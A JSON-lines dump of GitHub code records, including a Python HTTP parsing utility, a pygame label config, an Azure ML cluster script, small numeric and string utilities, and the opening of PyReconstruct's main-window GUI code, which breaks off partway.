'http'\n method = None\n path = None\n headers = []\n body = None\n\n @property\n def host(self):\n self.get_header('host')\n\n @property\n def url(self):\n netloc = None\n host = self.host if (self.host.find(':') == -1) else \"[%s]\" % self.host\n\n if (('https' == self.scheme and 443 == self.port) or\n ('http' == self.scheme and 80 == self.port)):\n netloc = host\n else:\n netloc = \"%s:%d\" % (self.host,self.port)\n return urlunsplit((self.scheme,netloc,self.path,None,None))\n\n def readStatusLine(self,data,pos):\n # HTTP-Version SP Status-Code SP Reason-Phrase CRLF\n pos = self.readMethod(data,pos)\n pos = self.readPath(data,pos)\n pos = self.readVersion(data,pos)\n return pos\n\n def readMethod(self,data,pos):\n end = data[pos:].find(\" \")\n self.method = int(data[pos:pos+end])\n return pos+end+1\n\n def readPath(self,data,pos):\n end = data[pos:].find(\" \")\n self.path = data[pos:pos+end]\n return pos+end+2\n\n def readVersion(self,data,pos):\n if \"HTTP/\" != data[pos:pos+5]:\n raise ValueError(\"Not HTTP-Version string at %d\" % pos)\n self.version = data[pos+5:pos+8]\n return pos+9\n\n\n def readHeaders(self,data,pos):\n cur = pos\n end = data[cur:].find(\"\\r\\n\")\n while end != 0:\n header = data[cur:cur+end]\n cur = cur+end+2\n end = data[cur:].find(\"\\r\\n\")\n while data[cur] in (\" \",\"\\t\"):\n header += self.data[cur:cur+end]\n cur = cur+end+2\n end = data[cur:].find(\"\\r\\n\")\n self.headers.append(header.split(': ',1))\n return cur+2 \n\n def get_header(self,header,caseinsensitive=True):\n for k,v in self.headers:\n if caseinsensitive:\n if k.lower() == header.lower():\n return v\n else:\n if k.lower() == header.lower():\n return v\n\n\nclass RawHTTPResponse(HTTPResponse):\n def __init__(self,data):\n pos = self.readStatusLine(data,0)\n pos = self.readHeaders(data,pos)\n content_length = filter(lambda x: x[0].lower() == \"content-length\", self.headers)\n if len(content_length) == 1:\n length = int(content_length[0][1])\n self.body = data[pos:pos+length]\n pos = pos+length\n if len(content_length) > 1:\n raise ValueError(\"Too many content-length headers!\")\n\n self.remainder = data[pos:]\n\n def __str__(self):\n buf = \"HTTP/%s %s %s\\r\\n\" % (self.version,self.status,self.reason)\n for k,v in self.headers:\n buf += \"%s: %s\\r\\n\" % (k,v) \n buf += \"\\r\\n\"\n buf += self.body\n return buf\n\n\n def readStatusLine(self,data,pos):\n # HTTP-Version SP Status-Code SP Reason-Phrase CRLF\n pos = self.readVersion(data,pos)\n pos = self.readStatusCode(data,pos)\n pos = self.readReasonPhrase(data,pos)\n return pos\n\n def readStatusCode(self,data,pos):\n self.status = int(data[pos:pos+4])\n return pos+4\n\n def readVersion(self,data,pos):\n if \"HTTP/\" != data[pos:pos+5]:\n raise ValueError(\"Not HTTP-Version string at %d\" % pos)\n self.version = data[pos+5:pos+8]\n return pos+9\n\n def readReasonPhrase(self,data,pos):\n end = data[pos:].find(\"\\r\\n\")\n self.reason = data[pos:pos+end]\n return pos+end+2\n\n def readHeaders(self,data,pos):\n self.headers = []\n cur = pos\n end = data[cur:].find(\"\\r\\n\")\n while end != 0:\n header = data[cur:cur+end]\n cur = cur+end+2\n end = data[cur:].find(\"\\r\\n\")\n while data[cur] in (\" \",\"\\t\"):\n header += self.data[cur:cur+end]\n cur = cur+end+2\n end = data[cur:].find(\"\\r\\n\")\n self.headers.append(header.split(': ',1))\n return cur+2 \n\n def get_header(self,header,caseinsensitive=True):\n for k,v in self.headers:\n if caseinsensitive:\n if k.lower() == header.lower():\n return v\n else:\n if k.lower() == header.lower():\n return v\n\n\nclass ParamHTTPRequest(HTTPRequest):\n '''\n Internal convenience class to generate an HTTP Request\n '''\n request_line = b\"%s %s HTTP/1.1\\r\\n\"\n headers = {}\n def __init__(self, url, method='GET', headers={},body=None):\n # parse the URL into a form we can create a GET request with\n p = urlparse(url)\n self.method = method\n self.scheme = p.scheme\n self.host = p.hostname.strip()\n self.port = 443 if self.scheme == 'https' else 80\n self.port = p.port if p.port else self.port\n self.path = p.path + '?' + p.query if p.query else p.path\n self.path = '/' if not p.path else self.path\n self.headers = dict([(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\")]+self.headers.items())\n self.body = body\n\n def __str__(self):\n # populate all the header format strings and join everything together\n retval = self.request_line % (self.method, self.path)\n if not self.headers.has_key(\"Host\"):\n retval += b\"Host: %s\\r\\n\" % self.host\n\n retval += '\\r\\n'.join([b\"%s: %s\" % kv for kv in self.headers.items()])\n retval += '\\r\\n'\n\n if self.body is not None:\n if not self.headers.has_key(\"Content-Length\"):\n retval += b\"Content-Length: %d\\r\\n\" % len(str(self.body))\n retval += '\\r\\n'\n retval += str(self.body)\n else:\n retval += '\\r\\n'\n\n return retval\n","repo_name":"CryptoPunk/looper","sub_path":"lib/looper/clients/httputil.py","file_name":"httputil.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"28907031501","text":"#Важно! Текстуры игры не умножены в 5(по умолчанию.) РАЗ! Они умножаются для pygame на этапе инициализации. Прошу учесть этот факт! Размеры окна без умножения: 135x100\n#Ещё. TX, TY это координаты текста кнопки, они рисуются на самом surface кнопки. BX, BX это координаты кнопки на экране.\n\nFONT = \"assets/GAME_FONT.ttf\"\n\nBUTTON_COLORS = [(255, 255, 255), (205, 205, 205), (105, 105, 105)]\nSCREEN_SIZE = [135, 100]\n\n#LABEL_ИМЯ = [\"TYPE\", \"ТЕКСТ\", (R, G, B), РАЗМЕР, X, Y]\n\nLABEL_HELLOWORLD = [\"Hello World!\", (255, 255, 255), 3, 0, 0]\nLABEL_FPS = [\"FPS:\", (255, 255, 255), 3, 0, 4]\n\nLABLE_TITLE = [\"Лютый Гонщик\", (255, 30, 0), 8, 20, 23]\nLABLE_MAINMENULB1 = [\"1 - 1 Игрок 2 - 2 Игрока\", (255, 255, 30), 3, 19, 58]\nLABLE_TELEGRAM = [\"By AltTeam. TG:t.me/lytigonchic\", (255, 255, 255), 2, 0, SCREEN_SIZE[1] - 2]\nLABLE_SOUNDOFF = [\"Звук Выключен\", (255, 0, 0), 3, 0, SCREEN_SIZE[1] - 3*2]\nLABLE_YOUSCOREINGAME1 = [\"Очки:\", (0, 180, 0), 3, 0, SCREEN_SIZE[1] - 3]\nLABLE_PAUSE = [\"Пауза\", (255, 255, 255), 3, 60, 8.4]\nLABLE_HOWTOEXITFROMPAUSE = [\"Выйти из паузы - ENTER\", (255, 255, 255), 3, 34.6, 90]\nLABLE_GAMEOVER = [\"Game Over!\", (0, 0, 0), 3*4, 10.5, 30]\nLABLE_YOUSCOREINGAME = [\"Ваши очки:\", (0, 0, 0), 3, 48, 47]\nLABLE_RECORD = [\"Рекорд:\", (0, 0, 0), 3, 48, 43.5]\nLABLE_HOWTOSTARTNEWGAME = ['Нажмите \"Enter\" для начала новой игры.', (0, 0, 0), 3, 11.5, 64]\nLABLE_SHOW_FPS = [\"FPS:\", (0, 0, 0), 0.5, 0, 0]\nLABLE_MAINMENULB2 = [\"3 - Настройки\", (255, 255, 30), 3, 46, 65]\nLABLE_OPTMENULB1 = [\"Настройки\", (255, 255, 255), 5, 46, 10]\nLABLE_OPTMENULB2 = [\"Маштаб:\", (255, 255, 255), 3, 10, 30]\nLABLE_OPTMENULB5 = [\"Сенсор. Упр:\", (255, 255, 255), 3, 10, 37.9]\nLABLE_OPTMENULB3 = [\"*Нужно выйти из игры для применения некоторых настроек.\", (200, 200, 200), 2, 13, 80]\nLABLE_OPTMENULB4 = [\"Режим фуллскрина:\", (255, 255, 255), 3, 10, 34]\nLABLE_OPTMENULB6 = [\"Звук:\", (255, 255, 255), 3, 10, 41.9]\nLABLE_OPTMENUPATH = [\"Game path:\", (255, 255, 255), 1, 0, 0]\n\n#BUTTON_ИМЯ = [\"ТЕКСТ\" TYPE, BUTTSZX, BUTTSZY, BX, BY]\n# TYPE - ONECL, MULTI\n\nBUTTON_OPTMENUPLUS = [\"+\", \"ONECL\", 5, 5, 35, 28.9]\nBUTTON_OPTMENUMIN = [\"-\", \"ONECL\", 5, 5, 41, 28.9]\nBUTTON_OPTMENUCHFULL = [\"Сменить\", \"ONECL\", 24, 5, 73, 32.9]\nBUTTON_OPTMENUCHONSP = [\"Сменить\", \"ONECL\", 24, 5, 50, 36.5]\nBUTTON_OPTMENUCHSOUN = [\"Сменить\", \"ONECL\", 24, 5, 29, 40.3]\nBUTTON_OPTMENUEXIT = [\"Выйти в меню\", \"ONECL\", 40, 5, SCREEN_SIZE[0]/2-40/2, 86]\n\nBUTTON_GAMEOVER_NEWGAME = [\"Заного\", \"ONECL\", 24, 5, 20, 64]\nBUTTON_GAMEOVER_EXIT = [\"Выйти\", \"ONECL\", 24, 5, SCREEN_SIZE[1]-9, 64]\n\nBUTTON_MAINMENU_ONEPL = [\"1 Игрок\", \"ONECL\", 25, 5, 55, 56]\nBUTTON_MAINMENU_TWOPL = [\"2 Игрока\", \"ONECL\", 25, 5, 55, 62]\nBUTTON_MAINMENU_NOTWOPL = [\"--------\", \"ONECL\", 25, 5, 55, 62]\nBUTTON_MAINMENU_OPTIONS = [\"Настро.\", \"ONECL\", 25, 5, 55, 68]\n\nBUTTON_PLAYING_MUTE = [\"MUTE\", \"ONECL\", 16, 5, 1, 6.3]\nBUTTON_PLAYING_PAUSE = [\"PAUSE\", \"ONECL\", 16, 5, 1, 1]\n\nBUTTON_PAUSE_RETURN = [\"Назад в игру\", \"ONECL\", 38, 5, SCREEN_SIZE[0]/2-38/2, 80]\nBUTTON_MAINMENU_MENU = [\"Меню\", \"ONECL\", 38, 5, SCREEN_SIZE[0]/2-38/2, 86]\nBUTTON_PAUSE_EXITFROMGAME = [\"Выйти из игры\", \"ONECL\", 40, 5, SCREEN_SIZE[0]/2-40/2, 92]\n\nBUTTON_PLAYING_ONEPLMODE_LEFT = [\"<\", \"MULTI\", 10, 10, 10, 80]\nBUTTON_PLAYING_ONEPLMODE_RIGHT = [\">\", \"MULTI\", 10, 10, 115, 80]\n\nBUTTON_PLAYING_TWOPLMODE_P1LEFT = [\"<\", \"MULTI\", 10, 10, 10, 80]\nBUTTON_PLAYING_TWOPLMODE_P1RIGHT = [\">\", \"MULTI\", 10, 10, 25, 80]\nBUTTON_PLAYING_TWOPLMODE_P2LEFT = [\"<\", \"MULTI\", 10, 10, 100, 80]\nBUTTON_PLAYING_TWOPLMODE_P2RIGHT = [\">\", \"MULTI\", 10, 10, 115, 80]","repo_name":"MagAcademy30/LytiyGonhic-archive","sub_path":"0.5v/labels.py","file_name":"labels.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34308570166","text":"import os\nfrom azureml.core import Workspace\nfrom azureml.core.compute import ComputeTarget, AmlCompute\nfrom azureml.core.compute_target import ComputeTargetException\nfrom azureml.core.authentication import InteractiveLoginAuthentication\n\n# try:\nTENANT_ID = os.getenv(\"TENANT_ID\")\ninteractive_auth = InteractiveLoginAuthentication(tenant_id=TENANT_ID)\n# except:\n# print(\"Need to export TENANT_ID, and get if from 'az account show --output table'!\")\n\n\nws = Workspace.from_config()\n\n# Choose a name for your GPU cluster\ngpu_cluster_name = \"gpu-nc12\"\n\n# Verify that the cluster does not exist already\ntry:\n gpu_cluster = ComputeTarget(workspace=ws, name=gpu_cluster_name)\n print('Found existing cluster, use it.')\nexcept ComputeTargetException:\n compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_NC12',\n idle_seconds_before_scaledown=1200,\n min_nodes=0,\n max_nodes=1)\n gpu_cluster = ComputeTarget.create(ws, gpu_cluster_name, compute_config)\n\ngpu_cluster.wait_for_completion(show_output=True)\n","repo_name":"radiantearth/gmlmc-hackathon-pearl","sub_path":"azure/create_compute.py","file_name":"create_compute.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74204953067","text":"import numpy as np\nimport sys\n\n\ndef RunPythonModel(samples):\n\n qoi = list()\n beta = 3.0902\n for i in range(samples.shape[0]):\n qoi.append(-1/np.sqrt(2) * (samples[0, 0] + samples[0, 1]) + beta)\n return qoi\n \n ","repo_name":"chuanzhidong/UQpy","sub_path":"example/SubsetSimulation/SubsetSimulation_Example1/pfn.py","file_name":"pfn.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"37250507498","text":"from itertools import combinations\nimport re\n\ndef get_pairs(s):\n s=set(s)\n comb=combinations(s,2)\n d=dict()\n for c in comb:\n d[c]=''.join(list(s-set(c)))\n return d\n\ndef remove_chars(s,chars):\n return re.sub('['+chars+']','',s)\n \ndef is_valid(s):\n return re.search(r'(.)\\1',s) is None\n\ndef twoCharaters(s):\n pairs=get_pairs(s)\n ma=0\n for pair,left_chars in pairs.items():\n word=remove_chars(s,left_chars)\n if is_valid(word):\n ma=max(ma,len(word))\n return ma\n\n\n\n\n# print(get_pairs(\"aaabcd\"))\n# print (remove_chars(\"abcdab\",'ba'))\n# print (is_valid('abch'))\nprint (twoCharaters(\"abcadd\"))\n","repo_name":"vadim-ivlev/STUDY","sub_path":"coding/pass.py","file_name":"pass.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6649559772","text":"import os\nimport sys\nimport time\nfrom datetime import datetime\nimport json\nimport subprocess\n\nfrom PySide6.QtWidgets import (\n QMainWindow, \n QInputDialog, \n QApplication,\n QMessageBox, \n QMenu\n)\nfrom PySide6.QtGui import (\n QKeySequence,\n QShortcut,\n QPixmap\n)\nfrom PySide6.QtCore import Qt, QSettings\n\nfrom .field_widget import FieldWidget\n\nfrom PyReconstruct.modules.gui.palette import MousePalette, ZarrPalette\nfrom PyReconstruct.modules.gui.dialog import (\n AlignmentDialog,\n GridDialog,\n CreateZarrDialog,\n TrainDialog,\n SegmentDialog,\n PredictDialog,\n QuickDialog,\n FileDialog\n)\nfrom PyReconstruct.modules.gui.popup import TextWidget, CustomPlotter\nfrom PyReconstruct.modules.gui.utils import (\n populateMenuBar,\n populateMenu,\n notify,\n saveNotify,\n unsavedNotify,\n setMainWindow,\n noUndoWarning\n)\nfrom PyReconstruct.modules.gui.table import HistoryTableWidget, CopyTableWidget, HelpWidget\nfrom PyReconstruct.modules.backend.func import (\n xmlToJSON,\n jsonToXML,\n importTransforms,\n importSwiftTransforms\n)\nfrom PyReconstruct.modules.backend.autoseg import seriesToZarr, seriesToLabels, labelsToObjects\nfrom PyReconstruct.modules.datatypes import Series, Transform, Flag\nfrom PyReconstruct.modules.constants import welcome_series_dir, assets_dir, img_dir\n\nclass MainWindow(QMainWindow):\n\n def __init__(self, filename):\n \"\"\"Constructs the skeleton for an empty main window.\"\"\"\n super().__init__() # initialize QMainWindow\n self.setWindowTitle(\"PyReconstruct\")\n\n # catch all exceptions and display error message\n def customExcepthook(exctype, value, traceback):\n \"\"\"\n Global exception hook to display a notification window.\n \"\"\"\n message = f\"An error occurred: {str(value)}\\n(see console)\"\n QMessageBox.critical(None, \"Error\", message, QMessageBox.Ok)\n sys.__excepthook__(exctype, value, traceback) # Call the default exception hook\n\n # Set the exception hook\n sys.excepthook = customExcepthook\n\n # set the window icon\n pix = QPixmap(os.path.join(img_dir, \"PyReconstruct.ico\"))\n self.setWindowIcon(pix)\n\n # set the main window to be slightly less than the size of the monitor\n screen = QApplication.primaryScreen()\n screen_rect = screen.size()\n x = 50\n y = 80\n w = screen_rect.width() - 100\n h = screen_rect.height() - 160\n self.setGeometry(x, y, w, h)\n\n # misc defaults\n self.series = None\n self.series_data = None\n self.field = None # placeholder for field\n self.menubar = None\n self.mouse_palette = None # placeholder for palettes\n self.zarr_palette = None\n self.viewer = None\n self.shortcuts_widget = None\n self.setMouseTracking(True) # set constant mouse tracking for various mouse modes\n self.is_zooming = False\n self.restart_mainwindow = False\n try: # os.getlogin() fails on TACC\n self.user = os.getlogin()\n except:\n self.user = \"\"\n\n # create status bar at bottom of window\n self.statusbar = self.statusBar()\n\n # open the series requested from command line\n if filename and os.path.isfile(filename):\n self.openSeries(jser_fp=filename)\n else:\n welcome_series = Series(\n os.path.join(\n welcome_series_dir,\n \"welcome.ser\"\n ),\n {0: \"welcome.0\"}\n )\n welcome_series.src_dir = os.path.dirname(welcome_series_dir) # set the images directory for the welcome series\n self.openSeries(welcome_series)\n \n self.field.generateView()\n\n # create menu and shortcuts\n self.createMenuBar()\n self.createContextMenus()\n self.createShortcuts()\n\n # set the main window as the parent of the progress bar\n setMainWindow(self)\n\n self.show()\n\n # prompt the user for a username\n self.changeUsername()\n\n def createMenuBar(self):\n \"\"\"Create the menu for the main window.\"\"\"\n menu = [\n \n {\n \"attr_name\": \"filemenu\",\n \"text\": \"File\",\n \"opts\":\n [ \n {\n \"attr_name\": \"newseriesmenu\",\n \"text\": \"New\",\n \"opts\":\n [\n (\"newfromimages_act\", \"From images...\", \"Ctrl+N\", self.newSeries),\n (\"newfromzarr_act\", \"From zarr...\", \"\", lambda : self.newSeries(from_zarr=True)),\n (\"newfromxml_act\", \"From legacy .ser...\", \"\", self.newFromXML)\n ]\n },\n (\"open_act\", \"Open\", \"Ctrl+O\", self.openSeries),\n None, # None acts as menu divider\n (\"save_act\", \"Save\", \"Ctrl+S\", self.saveToJser),\n (\"saveas_act\", \"Save as...\", \"\", self.saveAsToJser),\n (\"backup_act\", \"Auto-backup series\", \"checkbox\", self.autoBackup),\n None,\n (\"username_act\", \"Change username...\", \"\", self.changeUsername),\n None,\n (\"restart_act\", \"Reload\", \"Ctrl+R\", self.restart),\n (\"quit_act\", \"Quit\", \"Ctrl+Q\", self.close),\n ]\n },\n\n {\n \"attr_name\": \"editmenu\",\n \"text\": \"Edit\",\n \"opts\":\n [\n (\"undo_act\", \"Undo\", \"Ctrl+Z\", self.field.undoState),\n (\"redo_act\", \"Redo\", \"Ctrl+Y\", self.field.redoState),\n None,\n (\"cut_act\", \"Cut\", \"Ctrl+X\", self.field.cut),\n (\"copy_act\", \"Copy\", \"Ctrl+C\", self.copy),\n (\"paste_act\", \"Paste\", \"Ctrl+V\", self.field.paste),\n (\"pasteattributes_act\", \"Paste attributes\", \"Ctrl+B\", self.field.pasteAttributes),\n None,\n (\"pastetopalette_act\", \"Paste attributes to palette\", \"Shift+G\", self.pasteAttributesToPalette),\n (\"pastetopalettewithshape_act\", \"Paste attributes to palette (include shape)\", \"Ctrl+Shift+G\", lambda : self.pasteAttributesToPalette(True)),\n None,\n {\n \"attr_name\": \"bcmenu\",\n \"text\": \"Brightness/contrast\",\n \"opts\":\n [\n (\"incbr_act\", \"Increase brightness\", \"=\", lambda : self.editImage(option=\"brightness\", direction=\"up\")),\n (\"decbr_act\", \"Decrease brightness\", \"-\", lambda : self.editImage(option=\"brightness\", direction=\"down\")),\n (\"inccon_act\", \"Increase contrast\", \"]\", lambda : self.editImage(option=\"contrast\", direction=\"up\")),\n (\"deccon_act\", \"Decrease contrast\", \"[\", lambda : self.editImage(option=\"contrast\", direction=\"down\"))\n ]\n }\n ]\n },\n\n {\n \"attr_name\": \"seriesmenu\",\n \"text\": \"Series\",\n \"opts\":\n [\n {\n \"attr_name\": \"importmenu\",\n \"text\": \"Import\",\n \"opts\":\n [\n {\n \"attr_name\": \"importjser\",\n \"text\": \"From jser file\",\n \"opts\":\n [\n (\"importtraces_act\", \"Traces...\", \"\", self.importTraces),\n (\"importzrtraces_act\", \"Z-traces...\", \"\", self.importZtraces),\n (\"importflags_act\", \"Flags...\", \"\", self.importFlags),\n (\"importtracepalette_act\", \"Trace palette...\", \"\", self.importTracePalette),\n (\"importseriestransforms_act\", \"Image transforms...\", \"\", self.importSeriesTransforms),\n (\"importbc_act\", \"Brightness/contrast...\", \"\", self.importBC)\n ]\n }\n ]\n\t\t },\n\t\t {\n \"attr_name\": \"exportmenu\",\n \"text\": \"Export\",\n \"opts\":\n [\n (\"exportjser_act\", \"as backup jser...\", \"Ctrl+Shift+B\", self.manualBackup),\n (\"exportxml_act\", \"as legacy XML series...\", \"\", self.exportToXML)\n ]\n\t\t },\n\t\t {\n \"attr_name\": \"imagesmenu\",\n \"text\": \"Images\",\n \"opts\":\n [\n (\"change_src_act\", \"Find/change image directory\", \"\", self.changeSrcDir),\n (\"zarrimage_act\", \"Convert to zarr\", \"\", self.srcToZarr),\n (\"scalezarr_act\", \"Update zarr scales\", \"\", lambda : self.srcToZarr(create_new=False))\n ]\n },\n\t\t {\n \"attr_name\": \"listsmenu\",\n \"text\": \"Lists / History\",\n \"opts\":\n [\n (\"objectlist_act\", \"Object list\", \"Ctrl+Shift+O\", self.openObjectList),\n (\"ztracelist_act\", \"Z-trace list\", \"Ctrl+Shift+Z\", self.openZtraceList),\n (\"flaglist_act\", \"Flag list\", \"\", self.openFlagList),\n (\"history_act\", \"View series history\", \"\", self.viewSeriesHistory),\n ]\n },\n {\n \"attr_name\": \"alignmentsmenu\",\n \"text\": \"Alignments\",\n \"opts\":\n [\n {\n \"attr_name\": \"importmenu\",\n \"text\": \"Import alignments\",\n \"opts\":\n [\n (\"importjsertransforms_act\", \"jser file\", \"\", self.importSeriesTransforms),\n (\"importtransforms_act\", \".txt file\", \"\", self.importTransforms),\n (\"import_swift_transforms_act\", \"SWiFT project\", \"\", self.importSwiftTransforms),\n ]\n },\n (\"changealignment_act\", \"Change alignment\", \"Ctrl+Shift+A\", self.changeAlignment),\n {\n \"attr_name\": \"propagatemenu\",\n \"text\": \"Propagate transform\",\n \"opts\":\n [\n (\"startpt_act\", \"Start propagation recording\", \"\", lambda : self.field.setPropagationMode(True)),\n (\"endpt_act\", \"End propagation recording\", \"\", lambda : self.field.setPropagationMode(False)),\n None,\n (\"proptostart_act\", \"Propagate to start\", \"\", lambda : self.field.propagateTo(False)),\n (\"proptoend_act\", \"Propagate to end\", \"\", lambda : self.field.propagateTo(True))\n ]\n }\n ]\n },\n {\n \"attr_name\": \"serieshidemenu\",\n \"text\": \"Hide\",\n \"opts\":\n [\n (\"hidealltraces_act\", \"Hide all traces\", \"\", self.hideSeriesTraces),\n (\"unhidealltraces_act\", \"Unhide all traces\", \"\", lambda : self.hideSeriesTraces(hidden=False))\n ]\n },\n\t\t {\n \"attr_name\": \"threedeemenu\",\n \"text\": \"3D\",\n \"opts\":\n [\n (\"smoothing_act\", \"Change smoothing type...\", \"\", self.edit3DSmoothing),\n ]\n },\n {\n \"attr_name\": \"traepalette_menu\",\n \"text\": \"Trace Palette\",\n \"opts\":\n [\n (\"modifytracepalette_act\", \"All palettes...\", \"Ctrl+Shift+P\", self.mouse_palette.modifyAllPaletteButtons),\n (\"resetpalette_act\", \"Reset current palette\", \"\", self.resetTracePalette)\n ]\n },\n None,\n (\"findobjectfirst_act\", \"Find first object contour...\", \"Ctrl+F\", self.findObjectFirst),\n (\"removeduplicates_act\", \"Remove duplicate traces\", \"\", self.deleteDuplicateTraces),\n (\"calibrate_act\", \"Calibrate pixel size...\", \"\", self.calibrateMag),\n ]\n },\n \n {\n \"attr_name\": \"sectionmenu\",\n \"text\": \"Section\",\n \"opts\":\n [\n (\"nextsection_act\", \"Next section\", \"PgUp\", self.incrementSection),\n (\"prevsection_act\", \"Previous section\", \"PgDown\", lambda : self.incrementSection(down=True)),\n None,\n (\"sectionlist_act\", \"Section list\", \"Ctrl+Shift+S\", self.openSectionList),\n (\"goto_act\", \"Go to section\", \"Ctrl+G\", self.changeSection),\n (\"changetform_act\", \"Change transformation\", \"Ctrl+T\", self.changeTform),\n None,\n (\"tracelist_act\", \"Trace list\", \"Ctrl+Shift+T\", self.openTraceList),\n (\"findcontour_act\", \"Find contour...\", \"Ctrl+Shift+F\", self.field.findContourDialog),\n None,\n (\"unlocksection_act\", \"Unlock current section\", \"Ctrl+Shift+U\", self.field.unlockSection),\n (\"linearalign_act\", \"Align linear\", \"\", self.field.linearAlign),\n # (\"quickalign_act\", \"Auto-align\", \"Ctrl+\\\\\", self.field.quickAlign)\n ]\n },\n\n {\n \"attr_name\": \"viewmenu\",\n \"text\": \"View\",\n \"opts\":\n [\n (\"fillopacity_act\", \"Edit fill opacity...\", \"\", self.setFillOpacity),\n None,\n (\"homeview_act\", \"Set view to image\", \"Home\", self.field.home),\n (\"viewmag_act\", \"View magnification...\", \"\", self.field.setViewMagnification),\n (\"findview_act\", \"Set zoom for finding contours...\", \"\", self.setFindZoom),\n None,\n (\"toggleztraces_act\", \"Toggle show Z-traces\", \"\", self.toggleZtraces),\n None,\n {\n \"attr_name\": \"togglepalettemenu\",\n \"text\": \"Toggle palette\",\n \"opts\":\n [\n (\"togglepalette_act\", \"Trace palette\", \"checkbox\", self.mouse_palette.togglePalette),\n (\"toggleinc_act\", \"Section increment buttons\", \"checkbox\", self.mouse_palette.toggleIncrement),\n (\"togglebc_act\", \"Brightness/contrast sliders\", \"checkbox\", self.mouse_palette.toggleBC),\n\n ]\n },\n (\"resetpalette_act\", \"Reset palette position\", \"\", self.mouse_palette.resetPos),\n None,\n (\"togglecuration_act\", \"Toggle curation in object lists\", \"Ctrl+Shift+C\", self.toggleCuration)\n ]\n },\n {\n \"attr_name\": \"autosegmenu\",\n \"text\": \"Autosegment\",\n \"opts\":\n [\n (\"export_zarr_act\", \"Export to zarr...\", \"\", self.exportToZarr),\n (\"trainzarr_act\", \"Train...\", \"\", self.train),\n (\"retrainzarr_act\", \"Retrain...\", \"\", lambda : self.train(retrain=True)),\n (\"predictzarr_act\", \"Predict (infer)...\", \"\", self.predict),\n (\"sementzarr_act\", \"Segment...\", \"\", self.segment),\n {\n \"attr_name\": \"zarrlayermenu\",\n \"text\": \"Zarr layer\",\n \"opts\":\n [\n (\"setzarrlayer_act\", \"Set zarr layer...\", \"\", self.setZarrLayer),\n (\"removezarrlayer_act\", \"Remove zarr layer\", \"\", self.removeZarrLayer)\n ]\n }\n ]\n },\n {\n \"attr_name\": \"helpmenu\",\n \"text\": \"Help\",\n \"opts\":\n [\n (\"shortcutshelp_act\", \"Shortcuts list\", \"?\", self.displayShortcuts)\n ]\n }\n ]\n\n if self.menubar:\n self.menubar.close()\n\n # Populate menu bar with menus and options\n self.menubar = self.menuBar()\n self.menubar.setNativeMenuBar(False)\n populateMenuBar(self, self.menubar, menu)\n \n def createContextMenus(self):\n \"\"\"Create the right-click menus used in the field.\"\"\"\n field_menu_list = [\n (\"edittrace_act\", \"Edit attributes...\", \"Ctrl+E\", self.field.traceDialog),\n {\n \"attr_name\": \"modifymenu\",\n \"text\": \"Modify\",\n \"opts\":\n [\n (\"mergetraces_act\", \"Merge traces\", \"Ctrl+M\", self.field.mergeSelectedTraces),\n (\"mergeobjects_act\", \"Merge attributes...\", \"Ctrl+Shift+M\", lambda : self.field.mergeSelectedTraces(merge_attrs=True)),\n None,\n (\"makenegative_act\", \"Make negative\", \"\", self.field.makeNegative),\n (\"makepositive_act\", \"Make positive\", \"\", lambda : self.field.makeNegative(False)),\n # None,\n # (\"markseg_act\", \"Add to good segmentation group\", \"Shift+G\", self.markKeep)\n ]\n },\n {\n \"attr_name\": \"curatemenu\",\n \"text\": \"Set curation\",\n \"opts\":\n [\n (\"blankcurate_act\", \"Blank\", \"\", lambda : self.field.setCuration(\"\")),\n (\"needscuration_act\", \"Needs curation\", \"\", lambda : self.field.setCuration(\"Needs curation\")),\n (\"curated_act\", \"Curated\", \"\", lambda : self.field.setCuration(\"Curated\"))\n ]\n },\n None,\n {\n \"attr_name\": \"viewmenu\",\n \"text\": \"View\",\n \"opts\":\n [\n (\"hidetraces_act\", \"Hide traces\", \"Ctrl+H\", self.field.hideTraces),\n (\"unhideall_act\", \"Unhide all traces\", \"Ctrl+U\", self.field.unhideAllTraces),\n None,\n (\"hideall_act\", \"Toggle hide all\", \"H\", self.field.toggleHideAllTraces),\n (\"showall_act\", \"Toggle show all\", \"A\", self.field.toggleShowAllTraces),\n None,\n (\"hideimage_act\", \"Toggle hide image\", \"I\", self.field.toggleHideImage),\n (\"blend_act\", \"Toggle section blend\", \" \", self.field.toggleBlend),\n ]\n },\n None,\n self.cut_act,\n self.copy_act,\n self.paste_act,\n self.pasteattributes_act,\n None,\n (\"selectall_act\", \"Select all traces\", \"Ctrl+A\", self.field.selectAllTraces),\n (\"deselect_act\", \"Deselect traces\", \"Ctrl+D\", self.field.deselectAllTraces),\n None,\n (\"createflag_act\", \"Create flag...\", \"\", self.field.createTraceFlag),\n None,\n (\"deletetraces_act\", \"Delete traces\", \"Del\", self.backspace)\n ]\n self.field_menu = QMenu(self)\n populateMenu(self, self.field_menu, field_menu_list)\n\n # organize actions\n self.trace_actions = [\n self.edittrace_act,\n self.modifymenu,\n self.mergetraces_act,\n self.makepositive_act,\n self.makenegative_act,\n self.hidetraces_act,\n self.cut_act,\n self.copy_act,\n self.pasteattributes_act,\n self.createflag_act\n ]\n self.ztrace_actions = [\n self.edittrace_act\n ]\n\n # create the label menu\n label_menu_list = [\n (\"importlabels_act\", \"Import label(s)\", \"\", self.importLabels),\n (\"mergelabels_act\", \"Merge labels\", \"\", self.mergeLabels)\n ]\n self.label_menu = QMenu(self)\n populateMenu(self, self.label_menu, label_menu_list)\n \n def checkActions(self, context_menu=False, clicked_trace=None, clicked_label=None):\n \"\"\"Check for actions that should be enabled or disabled\n \n Params:\n context_menu (bool): True if context menu is being generated\n clicked_trace (Trace): the trace that was clicked on IF the cotext menu is being generated\n \"\"\"\n # if both traces and ztraces are highlighted or nothing is highlighted, only allow general field options\n if not (bool(self.field.section.selected_traces) ^ \n bool(self.field.section.selected_ztraces)\n ):\n for a in self.trace_actions:\n a.setEnabled(False)\n for a in 